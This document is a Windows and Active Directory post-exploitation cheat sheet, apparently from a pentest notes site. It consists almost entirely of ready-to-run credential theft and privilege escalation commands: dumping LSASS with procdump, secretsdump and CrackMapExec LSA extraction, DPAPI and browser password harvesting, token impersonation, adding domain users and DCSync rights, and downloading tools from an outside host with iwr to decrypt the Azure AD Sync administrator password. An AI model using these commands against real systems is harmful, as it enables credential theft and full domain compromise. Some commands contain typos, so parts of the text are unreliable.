Administrator account
Extract credentials from LSASS
procdump.exe --acepteula -ma lsass.exe lsass.dmp
Extract Credentials from SAM
secretsdump.py <domain>/<user>:<password>@<ip>
Extract Credentials from LSA
cme smb <ip-range> -u <user> -p <password> --lsa
Extract dpapi
DonPAPI.py <domain>/<user>:<password>@<target>
Search Password Files
findstr /si 'password' *.txt *.xml .docx
Search Stored Password
lazagne.exe all
Chrome
%appdata%\Local\Google\Chrome\User Data\Default
SharpChromium.exe
Token Manipulation
.\incognito.exe list_tokens -u
.\incognito.exe execute -c "<domain>\<user>" powershell.exe
Account Operators Group Membership
Add User
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
Import PowerView
powershell -ep bypass
. .\PowerView.ps1
Add DCSync Rights
$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=<DOMAIN>" -PrincipalIdentity <USERNAME> -Rights DCSync
DCSync
impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'
Azure Admin Group Membership
If an user is Admin of Azure Group we can try to exploit Azure AD Sync to grab the administrator password:
iwr <IP>/AdDecryp.exe -o AdDecrypt.exe
iwr <IP>/mcrypt.dll -o mcrypt.dll
Then run this command being inside the path C:\Program Files\Microsoft Azure AD Sync\Bin :
C:\Temp\AdDecrypt.exe -FullSQL
Last updated